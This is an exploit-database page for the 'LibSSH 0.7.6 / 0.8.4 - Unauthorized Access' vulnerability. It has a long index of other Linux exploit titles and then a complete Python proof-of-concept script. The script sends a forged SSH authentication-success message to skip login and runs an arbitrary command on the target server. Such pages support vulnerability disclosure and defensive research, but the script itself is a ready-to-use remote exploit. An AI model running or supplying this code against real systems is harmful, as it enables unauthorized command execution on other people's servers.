Menu

"LibSSH 0.7.6 / 0.8.4 - Unauthorized Access"

Author

jas502n

Platform

linux

Release date

2018-10-20

Release Date Title Type Platform Author
2019-02-13 "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)" local linux embargo
2019-02-15 "Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference" dos linux "Google Security Research"
2019-02-12 "Jenkins 2.150.2 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-11 "CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting" webapps linux DKM
2019-02-13 "snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)" local linux "Chris Moberly"
2019-02-13 "snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)" local linux "Chris Moberly"
2019-02-12 "runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution" local linux feexd
2019-02-11 "Evince - CBT File Command Injection (Metasploit)" local linux Metasploit
2018-10-20 "LibSSH 0.7.6 / 0.8.4 - Unauthorized Access" remote linux jas502n
2019-01-29 "MiniUPnPd 2.1 - Out-of-Bounds Read" dos linux b1ack0wl
2019-01-23 "Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation" webapps linux "Chris Lyne"
2019-01-24 "Ghostscript 9.26 - Pseudo-Operator Remote Code Execution" remote linux "Google Security Research"
2019-01-28 "MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation" local linux d7x
2019-01-24 "AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-21 "GattLib 0.2 - Stack Buffer Overflow" remote linux "Dhiraj Mishra"
2019-01-16 "blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-21 "Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer" dos linux wally0813
2019-01-16 "NTPsec 1.1.2 - 'config' Authenticated Out-of-Bounds Write Denial of Service (PoC)" dos linux "Magnus Klaaborg Stubman"
2019-01-16 "NTPsec 1.1.2 - 'ntp_control' Authenticated NULL Pointer Dereference (PoC)" dos linux "Magnus Klaaborg Stubman"
2019-01-16 "NTPsec 1.1.2 - 'ntp_control' Out-of-Bounds Read (PoC)" dos linux "Magnus Klaaborg Stubman"
2019-01-16 "NTPsec 1.1.2 - 'ctl_getitem' Out-of-Bounds Read (PoC)" dos linux "Magnus Klaaborg Stubman"
2019-01-09 "polkit - Temporary auth Hijacking via PID Reuse and Non-atomic Fork" dos linux "Google Security Research"
2019-01-02 "Hashicorp Consul - Remote Command Execution via Services API (Metasploit)" remote linux Metasploit
2019-01-02 "Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)" remote linux Metasploit
2018-10-22 "Keybase keybase-redirector - '$PATH' Local Privilege Escalation" local linux mirchr
2018-12-24 "Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)" dos linux Sam
2018-12-19 "Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure" local linux "Jinbum Park"
2018-12-11 "GNU inetutils < 1.9.4 - 'telnet.c' Multiple Overflows (PoC)" dos linux "Hacker Fantastic"
2018-12-13 "Linux - 'userfaultfd' Bypasses tmpfs File Permissions" dos linux "Google Security Research"
2018-12-03 "Apache Superset < 0.23 - Remote Code Execution" webapps linux "David May"
2018-12-03 "PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure" webapps linux ParagonSec
2018-12-04 "OpenSSH < 7.7 - User Enumeration (2)" remote linux "Leap Security"
2018-12-03 "Budabot 4.0 - Denial of Service (PoC)" dos linux "Ryan Delaney"
2018-11-29 "PHP imap_open - Remote Code Execution (Metasploit)" remote linux Metasploit
2018-11-29 "Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)" local linux Metasploit
2018-11-29 "Unitrends Enterprise Backup - bpserverd Privilege Escalation (Metasploit)" local linux Metasploit
2018-11-30 "Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer" dos linux "Jinbum Park"
2018-11-26 "MariaDB Client 10.1.26 - Denial of Service (PoC)" dos linux strider
2018-11-16 "Linux - Broken uid/gid Mapping for Nested User Namespaces" local linux "Google Security Research"
2018-11-14 "Dell OpenManage Network Manager 6.2.0.51 SP3 - Multiple Vulnerabilities" webapps linux KoreLogic
2018-11-14 "PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass" local linux "Anton Lopanitsyn"
2018-11-14 "ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)" local linux "Magnus Klaaborg Stubman"
2018-11-13 "xorg-x11-server < 1.20.1 - Local Privilege Escalation" local linux bolonobolo
2018-11-13 "Evince 3.24.0 - Command Injection" dos linux Matlink
2018-11-12 "TufinOS 2.17 Build 1193 - XML External Entity Injection" webapps linux "Konstantinos Alexiou"
2018-11-07 "OpenSLP 2.0.0 - Multiple Vulnerabilities" local linux "Magnus Klaaborg Stubman"
2018-11-06 "libiec61850 1.3 - Stack Based Buffer Overflow" local linux "Dhiraj Mishra"
2018-10-08 "Imperva SecureSphere 13 - Remote Command Execution" webapps linux rsp3ar
2018-09-19 "Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting" webapps linux "Fahimeh Rezaei"
2018-09-14 "Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)" webapps linux "Stephen Shkardoon"
2018-09-12 "Rubedo CMS 3.4.0 - Directory Traversal" webapps linux "Marouene Boubakri"
2018-09-04 "RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution" webapps linux "Reigning Shells"
2018-08-16 "OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions" webapps linux "Joshua Fam"
2018-08-14 "Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)" webapps linux "Dhiraj Mishra"
2018-08-14 "cgit 1.2.1 - Directory Traversal (Metasploit)" webapps linux "Dhiraj Mishra"
2018-08-08 "LG-Ericsson iPECS NMS 30M - Directory Traversal" webapps linux "Safak Aslan"
2018-07-31 "Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection" webapps linux 0xB455
2018-07-30 "H2 Database 1.4.197 - Information Disclosure" webapps linux owodelta
2018-07-30 "Responsive Filemanager 9.13.1 - Server-Side Request Forgery" webapps linux "GUIA BRAHIM FOUAD"
2018-09-06 "Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)" webapps linux "Marko Jokic"
2018-07-27 "Online Trade 1 - Information Disclosure" webapps linux Dhamotharan
2018-07-26 "Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)" webapps linux "Zaran Shaikh"
2018-07-23 "Synology DiskStation Manager 4.1 - Directory Traversal" webapps linux "Berk Dusunur"
2018-07-10 "Elektronischer Leitz-Ordner 10 - SQL Injection" webapps linux "Jens Regel"
2018-06-25 "Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps linux LiquidWorm
2018-06-20 "Apache CouchDB < 2.1.0 - Remote Code Execution" webapps linux "Cody Zacharias"
2018-06-20 "NewMark CMS 2.1 - 'sec_id' SQL Injection" webapps linux "Berk Dusunur"
2018-06-18 "RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery (Add Admin)" webapps linux "Dolev Farhi"
2018-06-27 "HPE VAN SDN 2.7.18.0503 - Remote Root" webapps linux KoreLogic
2018-06-08 "Splunk < 7.0.1 - Information Disclosure" webapps linux KoF2002
2018-06-05 "Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)" webapps linux Kl3_GMjq6
2018-05-24 "EU MRV Regulatory Complete Solution 1 - Authentication Bypass" webapps linux Veyselxan
2018-05-24 "Honeywell XL Web Controller - Cross-Site Scripting" webapps linux t4rkd3vilz
2018-05-25 "Oracle WebCenter FatWire Content Server < 7 - Improper Access Control" webapps linux "Sebastian Cornejo"
2018-05-23 "Honeywell Scada System - Information Disclosure" webapps linux t4rkd3vilz
2018-05-22 "NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection" webapps linux AkkuS
2018-05-22 "Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting" webapps linux t4rkd3vilz
2018-05-21 "Merge PACS 7.0 - Cross-Site Request Forgery" webapps linux "Safak Aslan"
2018-05-21 "Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery" webapps linux t4rkd3vilz
2018-05-18 "SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion" webapps linux "Richard Alviarez"
2018-05-18 "SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure" webapps linux "Richard Alviarez"
2018-05-17 "Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery" webapps linux t4rkd3vilz
2018-05-16 "Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery" webapps linux L0RD
2018-05-06 "CSP MySQL User Manager 2.3.1 - Authentication Bypass" webapps linux "Youssef Mami"
2018-04-26 "SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response" webapps linux "Sven Fassbender"
2018-04-26 "Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution" webapps linux "Alessio Sergi"
2018-04-23 "Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation" webapps linux r4wd3r
2018-04-13 "MikroTik 6.41.4 - FTP daemon Denial of Service PoC" webapps linux FarazPajohan
2018-04-10 "Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control" webapps linux SlidingWindow
2018-04-09 "KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)" webapps linux LiquidWorm
2017-10-16 "3CX Phone System 15.5.3554.1 - Directory Traversal" webapps linux "Jens Regel"
2017-10-11 "Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal" webapps linux "Leonardo Duarte"
2017-09-19 "DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)" webapps linux "Mehmet Ince"
2017-09-18 "Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak" webapps linux "Hanno Bock"
2017-07-11 "NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection" webapps linux "Paul Taylor"
2017-07-10 "NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection" webapps linux "Paul Taylor"
2017-06-20 "BOA Web Server 0.94.14rc21 - Arbitrary File Access" webapps linux "Miguel Mendez Z"
2017-06-28 "Kaspersky Anti-Virus File Server 8.0.3.297 - Multiple Vulnerabilities" webapps linux "Core Security"
2017-06-16 "IBM Informix Dynamic Server - Code Injection / Remote Code Execution" webapps linux IMgod
2017-06-09 "IPFire 2.19 - Remote Code Execution" webapps linux 0x09AL
2017-06-01 "Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read" webapps linux "Gregory Draperi"
2017-04-24 "LogRhythm Network Monitor - Authentication Bypass / Command Injection" webapps linux "Francesco Oddo"
2017-05-03 "WordPress < 4.7.4 - Unauthorized Password Reset" webapps linux "Dawid Golunski"
2017-05-03 "WordPress 4.6 - Remote Code Execution" webapps linux "Dawid Golunski"
2017-05-01 "Alerton Webtalk 2.5/3.3 - Multiple Vulnerabilities" webapps linux "David Tomaschik"
2015-02-11 "WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)" webapps linux Metasploit
2015-02-11 "SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)" webapps linux Metasploit
2015-02-26 "D-Link/TRENDnet - NCC Service Command Injection (Metasploit)" webapps linux Metasploit
2014-10-15 "Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)" webapps linux Metasploit
2017-10-13 "FiberHome - Directory Traversal" webapps linux SecuriTeam
2017-11-21 "DblTek - Multiple Vulnerabilities" webapps linux SecuriTeam
2018-02-14 "Dell EMC Isilon OneFS - Multiple Vulnerabilities" webapps linux "Core Security"
2017-03-16 "Cobbler 2.8.0 - (Authenticated) Remote Code Execution" webapps linux "Dolev Farhi"
2008-09-04 "Zen Cart < 1.3.8a - SQL Injection" webapps linux "GulfTech Security"
2017-03-07 "Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution" webapps linux "Vex Woo"
2017-02-22 "Teradici Management Console 2.2.0 - Privilege Escalation" webapps linux hantwister
2016-12-12 "Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)" webapps linux xort
2017-02-12 "Kodi 17.1 - Arbitrary File Disclosure" webapps linux "Eric Flokstra"
2017-02-02 "WordPress 4.7.0/4.7.1 - Content Injection (Ruby)" webapps linux "Harsh Jaiswal"
2017-02-02 "WordPress 4.7.0/4.7.1 - Content Injection (Python)" webapps linux leonjza
2017-01-22 "NTOPNG 2.4 Web Interface - Cross-Site Request Forgery" webapps linux hyp3rlinx
2017-01-13 "Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution" webapps linux "Ozer Goker"
2016-08-16 "Pi-Hole Web Interface 2.8.1 - Persistent Cross-Site Scripting in Whitelist/Blacklist" webapps linux loneferret
2016-07-29 "Trend Micro Deep Discovery 3.7/3.8 SP1 (3.81)/3.8 SP2 (3.82) - 'hotfix_upload.cgi' Filename Remote Code Execution" webapps linux korpritzombie
2016-07-29 "AXIS (Multiple Products) - 'devtools ' (Authenticated) Remote Command Execution" webapps linux Orwelllabs
2016-03-31 "Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal" webapps linux "Andreas Lindh"
2016-02-26 "Zimbra 8.0.9 GA - Cross-Site Request Forgery" webapps linux Sysdream
2015-12-01 "Kodi 15 - Web Interface Arbitrary File Access" webapps linux "Machiel Pronk"
2015-10-02 "ElasticSearch 1.6.0 - Arbitrary File Download" webapps linux "Pedro Andujar"
2015-06-30 "CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion" webapps linux otr
2015-05-08 "Alienvault OSSIM/USM 4.14/4.15/5.0 - Multiple Vulnerabilities" webapps linux "Peter Lapp"
2000-12-19 "BOA Web Server 0.94.8.2 - Arbitrary File Access" webapps linux llmora
2015-04-02 "Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal" webapps linux "Anastasios Monachos"
2015-03-19 "Citrix Nitro SDK - Command Injection" webapps linux "Han Sahin"
2014-09-15 "CacheGuard-OS 5.7.7 - Cross-Site Request Forgery" webapps linux "William Costa"
2014-08-02 "ISPConfig 3.0.54p1 - (Authenticated) Admin Privilege Escalation" webapps linux mra
2014-07-21 "Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)" webapps linux "Brandon Perry"
2014-07-16 "BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities" webapps linux "SEC Consult"
2014-04-14 "eScan Web Management Console - Command Injection (Metasploit)" webapps linux Metasploit
2013-12-24 "Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)" webapps linux Metasploit
2007-07-10 "ImgSvr 0.6 - 'Template' Local File Inclusion" webapps linux "Tim Brown"
2013-12-06 "Zimbra 2009-2013 - Local File Inclusion" webapps linux rubina119
2013-10-15 "DornCMS Application 1.4 - Multiple Web Vulnerabilities" webapps linux Vulnerability-Lab
2013-09-30 "mod_accounting Module 0.5 - Blind SQL Injection" webapps linux Wireghoul
2013-09-25 "ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure" webapps linux "Yann CAM"
2016-09-13 "Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting Vulnerabilities" webapps linux "Benjamin Daniel Mussler"
2016-09-13 "Open-Xchange App Suite 7.8.2 - Cross-Site Scripting" webapps linux "Jakub A>>oczek"
2013-09-12 "Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities" webapps linux "Andrea Fabrizi"
2013-09-09 "Sophos Web Protection Appliance - Multiple Vulnerabilities" webapps linux "Core Security"
2013-08-22 "Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)" webapps linux Metasploit
2013-04-08 "Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities" webapps linux "SEC Consult"
2012-12-03 "Symantec Messaging Gateway 9.5.3-3 - Arbitrary File Download" webapps linux "Ben Williams"
2012-10-10 "Auxilium RateMyPet - Arbitrary File Upload (Metasploit)" webapps linux Metasploit
2012-08-21 "Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change" webapps linux Kc57
2012-08-21 "Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)" webapps linux Kc57
2012-07-24 "Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution" webapps linux muts
2012-07-23 "Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection" webapps linux muts
2012-07-23 "Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure" webapps linux Ciph3r
2012-06-27 "symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities" webapps linux "S2 Crew"
2012-04-29 "WebCalendar 1.2.4 - Remote Code Injection (Metasploit)" webapps linux Metasploit
2012-05-26 "Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution" webapps linux muts
2012-01-09 "Enigma2 Webinterface 1.5.x/1.6.x/1.7.x (Linux) - Remote File Disclosure" webapps linux "Todor Donev"
2011-10-07 "Spreecommerce 0.60.1 - Arbitrary Command Execution (Metasploit)" webapps linux Metasploit
2011-01-08 "Redmine SCM Repository 0.9.x/1.0.x - Arbitrary Command Execution (Metasploit)" webapps linux Metasploit
2010-08-27 "McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution" webapps linux "Nikolas Sotiriu"
2010-07-02 "Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (1)" webapps linux "Marcos Garcia & Maximiliano Soler"
2009-12-28 "PHP Forum ohne My SQL - Arbitrary File Upload" webapps linux "wlhaan hacker"
2009-12-28 "MySimpleFileUploader 1.6 - Arbitrary File Upload" webapps linux FormatXformat
2009-12-28 "egegen turkish script - SQL Injection" webapps linux FormatXformat
2009-12-14 "Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)" webapps linux "Milos Zivanovic"
2009-12-14 "NAS Uploader 1.0/1.5 - Arbitrary File Upload" webapps linux ViRuSMaN
2009-12-14 "myPHPupload 0.5.1 - Arbitrary File Upload" webapps linux ViRuSMaN
2009-12-14 "Digital Hive - Multiple Vulnerabilities" webapps linux ViRuSMaN
2009-12-14 "[WS] upload - Arbitrary File Upload" webapps linux ViRuSMaN
2009-12-01 "Quate CMS 0.3.5 - Local/Remote File Inclusion" webapps linux cr4wl3r
2009-12-01 "ISPworker 1.23 - Remote File Disclosure" webapps linux cr4wl3r
2009-12-01 "dotDefender 3.8-5 - Remote Command Execution" webapps linux "John Dos"
2008-07-09 "Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)" webapps linux "Jean-Michel BESNARD"
2018-10-29 "Paramiko 2.4.1 - Authentication Bypass" remote linux "Adam Brown"
2018-10-24 "exim 4.90 - Remote Code Execution" remote linux hackk.gr
2018-10-18 "libSSH - Authentication Bypass" remote linux "Dayanç Soyadlı"
2018-10-08 "Unitrends UEB - HTTP API Remote Code Execution (Metasploit)" remote linux Metasploit
2018-09-07 "Tenable WAS-Scanner 7.4.1708 - Remote Command Execution" remote linux "Sameer Goyal"
2017-02-08 "Node.JS - 'node-serialize' Remote Code Execution" remote linux OpSecX
2018-08-26 "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)" remote linux "Mazin Ahmed"
2018-08-21 "OpenSSH 2.3 < 7.7 - Username Enumeration" remote linux "Justin Gardner"
2018-08-16 "OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)" remote linux "Matthew Daley"
2018-08-01 "SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)" remote linux Metasploit
2018-07-27 "Axis Network Camera - .srv to parhand RCE (Metasploit)" remote linux Metasploit
2018-07-17 "QNAP Q'Center - 'change_passwd' Command Execution (Metasploit)" remote linux Metasploit
2018-07-13 "Hadoop YARN ResourceManager - Command Execution (Metasploit)" remote linux Metasploit
2018-07-13 "Apache CouchDB - Arbitrary Command Execution (Metasploit)" remote linux Metasploit
2018-03-20 "OpenSSH < 6.6 SFTP - Command Execution" remote linux SECFORCE
2018-07-09 "HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)" remote linux Metasploit
2018-07-09 "HP VAN SDN Controller - Root Command Injection (Metasploit)" remote linux Metasploit
2018-07-02 "Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)" remote linux Metasploit
2018-06-21 "Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution" remote linux "Paul Taylor"
2018-06-13 "DHCP Client - Command Injection 'DynoRoot' (Metasploit)" remote linux Metasploit
2018-06-04 "CyberArk < 10 - Memory Disclosure" remote linux "Thomas Zuk"
2018-05-17 "Jenkins CLI - HTTP Java Deserialization (Metasploit)" remote linux Metasploit
Release Date Title Type Platform Author
2018-10-20 "LibSSH 0.7.6 / 0.8.4 - Unauthorized Access" remote linux jas502n

Unfortunately we've not tracked down any possible victims.

Ads

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

# pip3 install paramiko==2.0.8

#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logging.basicConfig(stream=sys.stdout)
bufsize = 2048



def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))